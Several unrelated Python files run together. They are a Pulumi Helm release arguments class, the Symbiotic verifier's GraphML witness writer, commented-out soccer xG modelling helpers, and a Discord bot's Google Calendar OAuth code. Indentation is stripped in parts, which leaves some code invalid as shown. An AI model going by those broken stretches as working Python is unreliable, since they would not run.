:param pulumi.Input[bool] skip_crds: If set, no CRDs will be installed. By default, CRDs are installed if not already present.
:param pulumi.Input[int] timeout: Time in seconds to wait for any individual kubernetes operation.
:param pulumi.Input[Sequence[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]]] value_yaml_files: List of assets (raw yaml files). Content is read and merged with values. Not yet supported.
:param pulumi.Input[Mapping[str, Any]] values: Custom values set for the release.
:param pulumi.Input[bool] verify: Verify the package before installing it.
:param pulumi.Input[str] version: Specify the exact chart version to install. If this is not specified, the latest version is installed.
:param pulumi.Input[bool] wait_for_jobs: Will wait until all Jobs have been completed before marking the release as successful. This is ignored if `skipAwait` is enabled.
"""
if atomic is not None:
pulumi.set(__self__, "atomic", atomic)
if chart is not None:
pulumi.set(__self__, "chart", chart)
if cleanup_on_fail is not None:
pulumi.set(__self__, "cleanup_on_fail", cleanup_on_fail)
if create_namespace is not None:
pulumi.set(__self__, "create_namespace", create_namespace)
if dependency_update is not None:
pulumi.set(__self__, "dependency_update", dependency_update)
if description is not None:
pulumi.set(__self__, "description", description)
if devel is not None:
pulumi.set(__self__, "devel", devel)
if disable_crd_hooks is not None:
pulumi.set(__self__, "disable_crd_hooks", disable_crd_hooks)
if disable_openapi_validation is not None:
pulumi.set(__self__, "disable_openapi_validation", disable_openapi_validation)
if disable_webhooks is not None:
pulumi.set(__self__, "disable_webhooks", disable_webhooks)
if force_update is not None:
pulumi.set(__self__, "force_update", force_update)
if keyring is not None:
pulumi.set(__self__, "keyring", keyring)
if lint is not None:
pulumi.set(__self__, "lint", lint)
if manifest is not None:
pulumi.set(__self__, "manifest", manifest)
if max_history is not None:
pulumi.set(__self__, "max_history", max_history)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if postrender is not None:
pulumi.set(__self__, "postrender", postrender)
if recreate_pods is not None:
pulumi.set(__self__, "recreate_pods", recreate_pods)
if render_subchart_notes is not None:
pulumi.set(__self__, "render_subchart_notes", render_subchart_notes)
if replace is not None:
pulumi.set(__self__, "replace", replace)
if repository_opts is not None:
pulumi.set(__self__, "repository_opts", repository_opts)
if reset_values is not None:
pulumi.set(__self__, "reset_values", reset_values)
if resource_names is not None:
pulumi.set(__self__, "resource_names", resource_names)
if reuse_values is not None:
pulumi.set(__self__, "reuse_values", reuse_values)
if skip_await is not None:
pulumi.set(__self__, "skip_await", skip_await)
if skip_crds is not None:
pulumi.set(__self__, "skip_crds", skip_crds)
if timeout is not None:
pulumi.set(__self__, "timeout", timeout)
if value_yaml_files is not None:
pulumi.set(__self__, "value_yaml_files", value_yaml_files)
if values is not None:
pulumi.set(__self__, "values", values)
if verify is not None:
pulumi.set(__self__, "verify", verify)
if version is not None:
pulumi.set(__self__, "version", version)
if wait_for_jobs is not None:
pulumi.set(__self__, "wait_for_jobs", wait_for_jobs)
@property
@pulumi.getter
def atomic(self) -> Optional[pulumi.Input[bool]]:
"""
If set, installation process purges chart on fail. `skipAwait` will be disabled automatically if atomic is used.
"""
return pulumi.get(self, "atomic")
@atomic.setter
def atomic(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "atomic", value)
@property
@pulumi.getter
def chart(self) -> Optional[pulumi.Input[str]]:
"""
Chart name to be installed. A path may be used.
"""
return pulumi.get(self, "chart")
@chart.setter
def chart(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "chart", value)
@property
@pulumi.getter(name="cleanupOnFail")
def cleanup_on_fail(self) -> Optional[pulumi.Input[bool]]:
"""
Allow deletion of new resources created in this upgrade when upgrade fails.
"""
return pulumi.get(self, "cleanup_on_fail")
@cleanup_on_fail.setter
def cleanup_on_fail(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "cleanup_on_fail", value)
@property
@pulumi.getter(name="createNamespace")
def create_namespace(self) -> Optional[pulumi.Input[bool]]:
"""
Create the namespace if it does not exist.
"""
return pulumi.get(self, "create_namespace")
@create_namespace.setter
def create_namespace(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "create_namespace", value)
@property
@pulumi.getter(name="dependencyUpdate")
def dependency_update(self) -> Optional[pulumi.Input[bool]]:
"""
Run helm dependency update before installing the chart.
"""
return pulumi.get(self, "dependency_update")
@dependency_update.setter
def dependency_update(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "dependency_update", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Add a custom description
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def devel(self) -> Optional[pulumi.Input[bool]]:
"""
Use chart development versions, too. Equivalent to version '>0.0.0-0'. If `version` is set, this is ignored.
"""
return pulumi.get(self, "devel")
@devel.setter
def devel(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "devel", value)
@property
@pulumi.getter(name="disableCRDHooks")
def disable_crd_hooks(self) -> Optional[pulumi.Input[bool]]:
    """
    Prevent CRD hooks from running, but run other hooks. See helm install --no-crd-hook
    """
    return pulumi.get(self, "disable_crd_hooks")
@disable_crd_hooks.setter
def disable_crd_hooks(self, value: Optional[pulumi.Input[bool]]):
    pulumi.set(self, "disable_crd_hooks", value)
@property
@pulumi.getter(name="disableOpenapiValidation")
def disable_openapi_validation(self) -> Optional[pulumi.Input[bool]]:
"""
If set, the installation process will not validate rendered templates against the Kubernetes OpenAPI Schema
"""
return pulumi.get(self, "disable_openapi_validation")
@disable_openapi_validation.setter
def disable_openapi_validation(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disable_openapi_validation", value)
@property
@pulumi.getter(name="disableWebhooks")
def disable_webhooks(self) -> Optional[pulumi.Input[bool]]:
"""
Prevent hooks from running.
"""
return pulumi.get(self, "disable_webhooks")
@disable_webhooks.setter
def disable_webhooks(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disable_webhooks", value)
@property
@pulumi.getter(name="forceUpdate")
def force_update(self) -> Optional[pulumi.Input[bool]]:
"""
Force resource update through delete/recreate if needed.
"""
return pulumi.get(self, "force_update")
@force_update.setter
def force_update(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "force_update", value)
@property
@pulumi.getter
def keyring(self) -> Optional[pulumi.Input[str]]:
"""
Location of public keys used for verification. Used only if `verify` is true
"""
return pulumi.get(self, "keyring")
@keyring.setter
def keyring(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "keyring", value)
@property
@pulumi.getter
def lint(self) -> Optional[pulumi.Input[bool]]:
"""
Run helm lint when planning.
"""
return pulumi.get(self, "lint")
@lint.setter
def lint(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "lint", value)
@property
@pulumi.getter
def manifest(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
The rendered manifests as JSON. Not yet supported.
"""
return pulumi.get(self, "manifest")
@manifest.setter
def manifest(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "manifest", value)
@property
@pulumi.getter(name="maxHistory")
def max_history(self) -> Optional[pulumi.Input[int]]:
"""
Limit the maximum number of revisions saved per release. Use 0 for no limit.
"""
return pulumi.get(self, "max_history")
@max_history.setter
def max_history(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_history", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Release name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def namespace(self) -> Optional[pulumi.Input[str]]:
"""
Namespace to install the release into.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter
def postrender(self) -> Optional[pulumi.Input[str]]:
"""
Postrender command to run.
"""
return pulumi.get(self, "postrender")
@postrender.setter
def postrender(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "postrender", value)
@property
@pulumi.getter(name="recreatePods")
def recreate_pods(self) -> Optional[pulumi.Input[bool]]:
"""
Perform pods restart during upgrade/rollback.
"""
return pulumi.get(self, "recreate_pods")
@recreate_pods.setter
def recreate_pods(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "recreate_pods", value)
@property
@pulumi.getter(name="renderSubchartNotes")
def render_subchart_notes(self) -> Optional[pulumi.Input[bool]]:
"""
If set, render subchart notes along with the parent.
"""
return pulumi.get(self, "render_subchart_notes")
@render_subchart_notes.setter
def render_subchart_notes(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "render_subchart_notes", value)
@property
@pulumi.getter
def replace(self) -> Optional[pulumi.Input[bool]]:
"""
Re-use the given name, even if that name is already used. This is unsafe in production
"""
return pulumi.get(self, "replace")
@replace.setter
def replace(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "replace", value)
@property
@pulumi.getter(name="repositoryOpts")
def repository_opts(self) -> Optional[pulumi.Input['RepositoryOptsArgs']]:
"""
Specification defining the Helm chart repository to use.
"""
return pulumi.get(self, "repository_opts")
@repository_opts.setter
def repository_opts(self, value: Optional[pulumi.Input['RepositoryOptsArgs']]):
pulumi.set(self, "repository_opts", value)
@property
@pulumi.getter(name="resetValues")
def reset_values(self) -> Optional[pulumi.Input[bool]]:
"""
When upgrading, reset the values to the ones built into the chart.
"""
return pulumi.get(self, "reset_values")
@reset_values.setter
def reset_values(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "reset_values", value)
@property
@pulumi.getter(name="resourceNames")
def resource_names(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input[str]]]]]]:
"""
Names of resources created by the release grouped by "kind/version".
"""
return pulumi.get(self, "resource_names")
@resource_names.setter
def resource_names(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[Sequence[pulumi.Input[str]]]]]]):
pulumi.set(self, "resource_names", value)
@property
@pulumi.getter(name="reuseValues")
def reuse_values(self) -> Optional[pulumi.Input[bool]]:
"""
When upgrading, reuse the last release's values and merge in any overrides. If 'resetValues' is specified, this is ignored
"""
return pulumi.get(self, "reuse_values")
@reuse_values.setter
def reuse_values(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "reuse_values", value)
@property
@pulumi.getter(name="skipAwait")
def skip_await(self) -> Optional[pulumi.Input[bool]]:
"""
By default, the provider waits until all resources are in a ready state before marking the release as successful. Setting this to true will skip such await logic.
"""
return pulumi.get(self, "skip_await")
@skip_await.setter
def skip_await(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "skip_await", value)
@property
@pulumi.getter(name="skipCrds")
def skip_crds(self) -> Optional[pulumi.Input[bool]]:
"""
If set, no CRDs will be installed. By default, CRDs are installed if not already present.
"""
return pulumi.get(self, "skip_crds")
@skip_crds.setter
def skip_crds(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "skip_crds", value)
@property
@pulumi.getter
def timeout(self) -> Optional[pulumi.Input[int]]:
"""
Time in seconds to wait for any individual kubernetes operation.
"""
return pulumi.get(self, "timeout")
@timeout.setter
def timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "timeout", value)
@property
@pulumi.getter(name="valueYamlFiles")
def value_yaml_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]]]]:
"""
List of assets (raw yaml files). Content is read and merged with values. Not yet supported.
"""
return pulumi.get(self, "value_yaml_files")
@value_yaml_files.setter
def value_yaml_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]]]]):
pulumi.set(self, "value_yaml_files", value)
@property
@pulumi.getter
def values(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Custom values set for the release.
"""
return pulumi.get(self, "values")
@values.setter
def values(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "values", value)
@property
@pulumi.getter
def verify(self) -> Optional[pulumi.Input[bool]]:
"""
Verify the package before installing it.
"""
return pulumi.get(self, "verify")
@verify.setter
def verify(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "verify", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[str]]:
"""
Specify the exact chart version to install. If this is not specified, the latest version is installed.
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version", value)
@property
@pulumi.getter(name="waitForJobs")
def wait_for_jobs(self) -> Optional[pulumi.Input[bool]]:
"""
Will wait until all Jobs have been completed before marking the release as successful. This is ignored if `skipAwait` is enabled.
"""
return pulumi.get(self, "wait_for_jobs")
@wait_for_jobs.setter
def wait_for_jobs(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "wait_for_jobs", value)
@pulumi.input_type
class RepositoryOptsArgs:
    def __init__(__self__, *,
                 ca_file: Optional[pulumi.Input[str]] = None,
                 cert_file: Optional[pulumi.Input[str]] = None,
                 key_file: Optional[pulumi.Input[str]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 repo: Optional[pulumi.Input[str]] = None,
                 username: Optional[pulumi.Input[str]] = None):
        """
        Specification defining the Helm chart repository to use.
        :param pulumi.Input[str] ca_file: The repository's CA file
        :param pulumi.Input[str] cert_file: The repository's cert file
        :param pulumi.Input[str] key_file: The repository's cert key file
        :param pulumi.Input[str] password: Password for HTTP basic authentication
        :param pulumi.Input[str] repo: Repository where to locate the requested chart. If is a URL the chart is installed without installing the repository.
        :param pulumi.Input[str] username: Username for HTTP basic authentication
        """
        # Only store fields that were actually supplied, so Pulumi can tell
        # "unset" apart from an explicit None.
        if ca_file is not None:
            pulumi.set(__self__, "ca_file", ca_file)
        if cert_file is not None:
            pulumi.set(__self__, "cert_file", cert_file)
        if key_file is not None:
            pulumi.set(__self__, "key_file", key_file)
        if password is not None:
            pulumi.set(__self__, "password", password)
        if repo is not None:
            pulumi.set(__self__, "repo", repo)
        if username is not None:
            pulumi.set(__self__, "username", username)

    @property
    @pulumi.getter(name="caFile")
    def ca_file(self) -> Optional[pulumi.Input[str]]:
        """
        The repository's CA file
        """
        return pulumi.get(self, "ca_file")

    @ca_file.setter
    def ca_file(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "ca_file", value)

    @property
    @pulumi.getter(name="certFile")
    def cert_file(self) -> Optional[pulumi.Input[str]]:
        """
        The repository's cert file
        """
        return pulumi.get(self, "cert_file")

    @cert_file.setter
    def cert_file(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cert_file", value)

    @property
    @pulumi.getter(name="keyFile")
    def key_file(self) -> Optional[pulumi.Input[str]]:
        """
        The repository's cert key file
        """
        return pulumi.get(self, "key_file")

    @key_file.setter
    def key_file(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key_file", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """
        Password for HTTP basic authentication
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter
    def repo(self) -> Optional[pulumi.Input[str]]:
        """
        Repository where to locate the requested chart. If is a URL the chart is installed without installing the repository.
        """
        return pulumi.get(self, "repo")

    @repo.setter
    def repo(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "repo", value)

    @property
    @pulumi.getter
    def username(self) -> Optional[pulumi.Input[str]]:
        """
        Username for HTTP basic authentication
        """
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "username", value)
|
<filename>lib/symbioticpy/symbiotic/witnesses/witnesses.py
#!/usr/bin/python
from os.path import basename
from hashlib import sha256 as hashfunc
import datetime
import re
# no_lxml = False
# try:
# from lxml import etree as ET
# except ImportError:
# no_lxml = True
no_lxml = True
if no_lxml:
# if this fails, then we're screwed, so let the script die
from xml.etree import ElementTree as ET
def get_hash(source):
    """Return the SHA-256 hex digest of the text file at *source*.

    The file is read line by line as UTF-8 text and each line is re-encoded
    before hashing, so the digest reflects the decoded text (with universal
    newline translation), not necessarily the raw bytes on disk.
    """
    hsh = hashfunc()
    # 'with' guarantees the handle is closed even if reading or decoding
    # raises (the original leaked the handle on error).
    with open(source, 'r', encoding='utf-8') as f:
        for line in f:
            hsh.update(line.encode('utf-8'))
    return hsh.hexdigest()
class GraphMLWriter(object):
    """Builds GraphML verification witnesses (correctness or violation)
    in the SV-COMP witness exchange format."""

    def __init__(self, source, prps, is32bit, is_correctness_wit):
        # source: path to the analyzed C file (hashed into the witness)
        # prps: property/specification strings to record
        # is32bit: record '32bit' vs '64bit' architecture
        # is_correctness_wit: True -> correctness witness, else violation
        self._source = source
        self._prps = prps
        self._is32bit = is32bit
        self._correctness_wit = is_correctness_wit
        self._root = None
        self._graph = None
        # this prevents adding ns0 prefix to all tags
        ET.register_namespace("", "http://graphml.graphdrawing.org/xmlns")

    def _addCInfo(self):
        """Append the <data> metadata elements common to every witness."""
        assert self._root is not None
        if self._is32bit:
            arch = '32bit'
        else:
            arch = '64bit'
        # add the description
        if self._correctness_wit:
            ET.SubElement(self._graph, 'data',
                          key='witness-type').text = 'correctness_witness'
        else:
            ET.SubElement(self._graph, 'data',
                          key='witness-type').text = 'violation_witness'
        ET.SubElement(self._graph, 'data', key='sourcecodelang').text = 'C'
        ET.SubElement(self._graph, 'data', key='producer').text = 'Symbiotic'
        for p in self._prps:
            ET.SubElement(self._graph, 'data', key='specification').text = p
        ET.SubElement(self._graph, 'data', key='programfile').text = self._source
        ET.SubElement(self._graph, 'data',
                      key='programhash').text = get_hash(self._source)
        ET.SubElement(self._graph, 'data', key='architecture').text = arch
        ET.SubElement(self._graph, 'data', key='creationtime').text =\
            '{date:%Y-%m-%d %T}'.format(date=datetime.datetime.utcnow())

    def createTrivialWitness(self):
        """Create a minimal witness graph containing only the entry node."""
        if no_lxml:
            self._root = ET.Element('graphml')
        else:
            #ns = {"": 'http://graphml.graphdrawing.org/xmlns'}
            self._root = ET.Element('graphml')
        self._graphml = ET.ElementTree(self._root)
        self._graph = ET.SubElement(self._root, 'graph', edgedefault="directed")
        entry = ET.SubElement(self._graph, 'node', id='0')
        ET.SubElement(entry, 'data', key='entry').text = 'true'
        self._addCInfo()

    def parseError(self, ktest, is_termination):
        """
        Parse .path file from klee
        \param ktest the .ktest file
        \param filename name of the file the symbiotic ran on
                        -- in the case that we want to stick
                        only to this file in the witness
        """
        assert not self._correctness_wit
        # parse the graphml file from KLEE
        self._graphml = ET.parse('{0}graphml'.format(ktest[:ktest.rfind('.')+1]))
        assert self._graphml, "Failed parsing witness from KLEE"
        self._root = self._graphml.getroot()
        # Element.getchildren() was deprecated since Python 3.2 and REMOVED
        # in 3.9; iterating the element is the supported replacement.
        children = list(self._root)
        assert len(children) == 1
        self._graph = children[0]
        self._addCInfo()

    def dump(self):
        """Print the witness XML to stdout."""
        if no_lxml:
            print(ET.tostring(self._root).decode('utf-8'))
        else:
            print(ET.tostring(self._root, pretty_print=True).decode('utf-8'))

    def write(self, to):
        """Serialize the witness to *to* (a path or a file-like object)."""
        et = self._graphml
        if no_lxml:
            et.write(to, encoding='UTF-8', method="xml",
                     xml_declaration=True)
        else:
            et.write(to, encoding='UTF-8', method="xml",
                     pretty_print=True, xml_declaration=True)
|
import numpy as np
import pandas as pd
from sklearn.metrics import log_loss
import matplotlib.pyplot as plt
# def manual_train_split(df, train_sample_size=80):
# """input dataframe of shots, return train_test_split by game_id
# input dataframe -> get unique game ids -> take sample of 80/159 (may be some repeats from
# np.random.choice)
# first for loop: take those game ids and then add them to games_to_train_on
# second for loop: drop those games from the master 'possible_games' list
# return dataframe of shots (in specific games) to train model on
# --------------------------------------------------------------------
# holdout_test, train = manual_train_split(shots_df)
# returns: game_ids to hold out/predict on, list to train on
# """
# possible_games = list(df['game_id'].unique())
# game_numbers = len(possible_games)
# games_to_sample = np.random.choice(game_numbers, train_sample_size)
# games_to_train_on = []
# for i in games_to_sample:
# games_to_train_on.append(possible_games[i])
# for game in games_to_train_on:
# if game in possible_games:
# possible_games.remove(game)
# return possible_games, games_to_train_on
# def manual_test_split(possible_games, test_sample_size=50):
# """input: possible_games which is game_ids minus the game_ids used for training,
# test_sample_size is 50 games to predict on, usually less due to random sample
# output: list of games_ids to predict and remaining holdout set
# first for loop: takes random sample, then corresponding game_ids in list (by position)
# second for loop: removes those sample games from the possible_games list, leaving final holdout_list"""
# games_left = len(possible_games)
# games_to_sample = np.random.choice(games_left, test_sample_size)
# games_to_predict = []
# for i in games_to_sample:
# games_to_predict.append(possible_games[i])
# for game in games_to_predict:
# if game in possible_games:
# possible_games.remove(game)
# holdout_games = possible_games.copy()
# return holdout_games, games_to_predict
# def create_training_df(df, train_sample_size=90):
# """input total shot df and return training data split into train_data (x) and train_y (y)
# train_sample_size is the number of games (will sample 90 with some possible repeats)
# ex: train_data, train_y, indices, hold_test = training_df(shots_df)
# """
# rf_columns = ['player_id', 'shot_distance', 'shot_angle', 'assisted_shot', 'is_penalty_attempt']
# hold_test, train = manual_train_split(df)
# shots_to_train_on = df[df['game_id'].isin(np.array(train))].copy()
# train_data = shots_to_train_on[rf_columns].astype(float)
# train_y = shots_to_train_on['is_goal'].astype(float)
# indices = shots_to_train_on.index.values
# return train_data, train_y, indices, hold_test
# def create_test_df(df, hold_test):
# """input df, and previous hold_test from training_df to return
# test_data and test_y to be run through rf"""
# rf_columns = ['player_id', 'shot_distance', 'shot_angle', 'assisted_shot', 'is_penalty_attempt']
# holdout, test = manual_test_split(hold_test)
# shots_to_predict = df[df['game_id'].isin(np.array(test))].copy()
# test_data = shots_to_predict[rf_columns].astype(float)
# test_y = shots_to_predict['is_goal'].astype(float)
# indices1 = shots_to_predict.index.values
# return test_data, test_y, indices1, holdout, test
# def use_holdout_df(df, holdout):
# """insert df and holdout (game_ids not yet predicted) and return df to predict on"""
# rf_columns = ['player_id', 'shot_distance', 'shot_angle', 'assisted_shot', 'is_penalty_attempt']
# shots_to_predict = df[df['game_id'].isin(np.array(holdout))].copy()
# test_data = shots_to_predict[rf_columns].astype(float)
# test_y = shots_to_predict['is_goal'].astype(float)
# indices1 = shots_to_predict.index.values
# return test_data, test_y, indices1
# def create_xG_df(test_data, test_y, model_predictions):
# """create new dataframe with predicted probas and actual goals for predicted shots"""
# df = pd.DataFrame(test_data)
# df['is_goal'] = test_y
# df['xG'] = model_predictions[:, 1]
# df['xA'] = df['assisted_shot'] * df['xG']
# return df
# def create_hypothetical_df(test_data, model_predictions):
# """create new dataframe with predicted probas and actual goals for predicted shots"""
# df = pd.DataFrame(test_data)
# df['xG'] = model_predictions[:, 1]
# return df
# def create_summed_xG_df(df):
# """input xg_df and return dataframe of summed xg and xa for each player"""
# unique_players = df['player_id'].unique()
# contributions = []
# for player in unique_players:
# xgsum = round(df[df['player_id'] == player]['xG'].sum(), 2)
# xasum = round(df[df['player_id'] == player]['xA'].sum(), 2)
# xgxasum = round(xgsum + xasum, 2)
# goals = df[df['player_id'] == player]['is_goal'].sum()
# pen_attempts = df[df['player_id'] == player]['is_penalty_attempt'].sum()
# contributions.append([player, xgsum, xasum, xgxasum, pen_attempts, goals])
# by_xG = sorted(contributions, key=lambda x: x[1], reverse=True)
# contribution_df = pd.DataFrame(by_xG, columns=['player_id', 'total_xG', 'total_xA', 'total_xG+xA', 'pen_attempts', 'goals'])
# return contribution_df
# ### moving from shots to players and minutes
# def create_test_min_df(player_df, test):
# """input player_df and the list of games that were predited on to return
# the players and minuts played in the predicted games"""
# min_df = player_df[player_df['game_id'].isin(np.array(test))].copy()
# players = min_df['player_id'].unique()
# player_minutes = []
# for player in players:
# total_minutes = min_df[min_df['player_id'] == player]['minutes_played'].sum()
# name = min_df[min_df['player_id'] == player]['name'].iloc[0]
# player_minutes.append([player, total_minutes, name])
# player_minutes_df = pd.DataFrame(player_minutes, columns=['player_id', 'total_minutes_played', 'player_name'])
# return player_minutes_df
# def merged_dataframes(player_df, contribution_df):
# columns = ['player_name', 'player_id', 'total_xG', 'total_xA', 'total_xG+xA', 'goals', 'xG+xA/90', 'total_minutes_played']
# xg_min = pd.merge(contribution_df, player_df, on='player_id', how='outer')
# xg_min['xG+xA/90'] = xg_min['total_xG+xA'].copy() / (xg_min['total_minutes_played'] / 90)
# xg_final = xg_min[columns]
# return xg_final
# def player_minutes_total(players_minutes_df):
# """input player_minutes_df from create_test_min_df so that each row is a unique player"""
# players = players_minutes_df['player_id'].unique()
# player_minutes = []
# for player in players:
# total_minutes = players_minutes_df[players_minutes_df['player_id'] == player]['minutes_played'].sum()
# name = players_minutes_df[players_minutes_df['player_id'] == player]['name'].iloc[0]
# squad_num = players_minutes_df[players_minutes_df['player_id'] == player]['squad_number'].iloc[0]
# club_brev = players_minutes_df[players_minutes_df['player_id'] == player]['club_brev'].iloc[0]
# position_id = players_minutes_df[players_minutes_df['player_id'] == player]['position_id'].iloc[0]
# player_minutes.append([player, total_minutes, name, squad_num, club_brev, position_id])
# summed_player_min = pd.DataFrame(player_minutes, columns=['player_id', 'total_minutes_played', 'player_name', 'squad_num', 'club_brev', 'position_id'])
# return summed_player_min
# def create_rf_prep(df):
# """input df, return the appropriate columns to be run through rf"""
# rf_columns = ['shot_distance', 'shot_angle', 'assisted_shot']
# return df[rf_columns].astype(float)
# #use to tune classifiers
# def stage_score_plot(estimator, X_train, y_train, X_test, y_test):
# '''
# Parameters: estimator: GradientBoostingClassifier or xgBoostClassifier
# X_train: pandas dataframe
# y_train: 1d panda dataframe
# X_test: pandas dataframe
# y_test: 1d panda dataframe
# Returns: A plot of the number of iterations vs the log loss for the model for
# both the training set and test set.
# '''
# # fit estimator
# estimator.fit(X_train, y_train)
# train_logloss_at_stages = []
# test_logloss_at_stages = []
# # iterate through all stages for test and train and record log loss lists
# for y1, y2 in zip(estimator.staged_predict_proba(X_train), estimator.staged_predict_proba(X_test)):
# train_logloss = log_loss(y_train, y1)
# train_logloss_at_stages.append(train_logloss)
# test_logloss = log_loss(y_test, y2)
# test_logloss_at_stages.append(test_logloss)
# # find the # of trees at which test error is the lowest
# lowest_test_error = np.min(test_logloss_at_stages)
# num_trees_lowest_test_error = np.argmin(test_logloss_at_stages)
# # create xs in order to plot. each x represents n_estimators.
# xs = range(0, len(test_logloss_at_stages))
# fig, ax = plt.subplots(figsize=(8, 6))
# ax.plot(xs, train_logloss_at_stages,
# label="{} Train".format(estimator.__class__.__name__))
# ax.plot(xs, test_logloss_at_stages,
# label="{} Test".format(estimator.__class__.__name__))
# ax.axvline(num_trees_lowest_test_error)
# ax.legend()
# return lowest_test_error, num_trees_lowest_test_error
# # print(f'lowest test error(log loss): {lowest_test_error}')
# # print(f'num_trees at lowest test error: {num_trees_lowest_test_error}')
# # example of how to use:
# # fig, ax = plt.subplots(figsize=(12, 8))
# # stage_score_plot(gdbr_model, X_train, y_train, X_test, y_test)
# # stage_score_plot(gdbr_model_2, X_train, y_train, X_test, y_test)
# # ax.legend()
# # plt.show()
# def add_xg_shotdf(shot_df, model_pred):
# """add predicted xG to shot_df"""
# shot_df['xG'] = model_pred[:, 1] |
import datetime
from dateutil.parser import parse as dtparse
import discord
import requests
import pickle
import bs4
import time
import re
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
import google.oauth2.credentials
from oauth2client import tools
from oauth2client.file import Storage
from oauth2client.client import GoogleCredentials, OAuth2WebServerFlow
# If modifying these scopes, delete the file token.pickle.
GOOGLE_CLIENT_ID = os.environ.get('GOOGLE_CLIENT_ID')
GOOGLE_CLIENT_SECRET = os.environ.get('GOOGLE_CLIENT_SECRET')
GOOGLE_REFRESH_TOKEN = os.environ.get('GOOGLE_REFRESH_TOKEN')
TIME_ZONE_STR = '-05:00' if time.localtime().tm_isdst == 0 else '-04:00'
UMARL_CALENDAR_ID = '<EMAIL>'
WEEKDAYS = ("Monday","Tuesday","Wednesday","Thursday","Friday","Saturday","Sunday")
MONTHS = ("January", "February")
def refreshToken(client_id, client_secret, refresh_token):
    """Exchange a long-lived OAuth2 refresh token for a fresh access token.

    Returns the access-token string on success, or None if Google rejects
    the request.
    """
    params = {
        "grant_type": "refresh_token",
        "client_id": client_id,
        "client_secret": client_secret,
        "refresh_token": refresh_token
    }
    authorization_url = "https://www.googleapis.com/oauth2/v4/token"
    # requests has no default timeout; an explicit one keeps the bot from
    # hanging forever if the token endpoint never answers.
    r = requests.post(authorization_url, data=params, timeout=30)
    if r.ok:
        return r.json()['access_token']
    else:
        return None
async def get_credentials(ctx, client):
    """Return Google API credentials for the calendar service.

    Normally mints an access token from the stored refresh token.  If the
    resulting credentials are missing or invalid, falls back to an
    interactive OAuth flow: posts the authorization URL to the channel,
    waits for a reply containing the auth code, and exchanges it.
    """
    credentials = None
    # with open('refresh.token', 'r') as f:
    #     refresh_token = f.readline()
    access_token = refreshToken(GOOGLE_CLIENT_ID, GOOGLE_CLIENT_SECRET, GOOGLE_REFRESH_TOKEN)
    credentials = google.oauth2.credentials.Credentials(access_token)
    if not credentials or not credentials.valid:
        flow = OAuth2WebServerFlow(client_id=GOOGLE_CLIENT_ID,
                                   client_secret=GOOGLE_CLIENT_SECRET,
                                   scope='https://www.googleapis.com/auth/calendar',
                                   redirect_uri='http://id.heroku.com/oauth/authorize',
                                   prompt='consent')
        flow.user_agent = 'calendar-stff'
        authorize_url = flow.step1_get_authorize_url()
        # change this to give an error message and dm caleb instead
        await ctx.send(authorize_url)
        # NOTE(review): wait_for('message') has no check= or timeout — the
        # next message from anyone, in any channel, is treated as the auth
        # code; confirm this is intended.
        message = await client.wait_for('message')
        code = message.content
        credentials = flow.step2_exchange(code)
